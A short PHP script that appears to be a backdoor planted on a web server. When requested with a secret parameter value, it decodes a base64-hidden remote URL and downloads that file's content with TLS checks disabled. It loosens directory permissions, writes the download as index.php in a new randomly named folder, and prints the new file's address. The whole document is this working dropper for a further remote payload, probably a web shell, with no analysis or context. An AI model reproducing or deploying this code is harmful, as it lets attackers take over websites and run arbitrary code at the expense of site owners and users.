<?php if(isset($_GET['p']) && $_GET['p']=='8975') {$remote_url = base64_decode('aHR0cHM6Ly81MWxhLnp2bzIueHl6L2EyLnR4dA==');$path = str_replace(str_replace('//','/',$_SERVER['PHP_SELF']), '', str_replace('\\\\','/',$_SERVER['SCRIPT_FILENAME']) );$random_dir = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz0123456789"), 0, 8);$full_dir = rtrim($path,'/') . '/' . $random_dir;if(!is_dir($full_dir)) {if(!is_writable($path)) {@chmod($path, 0777);}@mkdir($full_dir, 0777, true);}$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $remote_url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);$acontent24n = curl_exec($ch);curl_close($ch);if($acontent24n) {$file_path = $full_dir . '/index.php';if(@file_put_contents($file_path, $acontent24n)) {@chmod($file_path, 0644);$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https://' : 'http://';$domain = $_SERVER['HTTP_HOST'];echo $protocol . $domain . '/' . $random_dir . '/index.php?520';}}}die();?>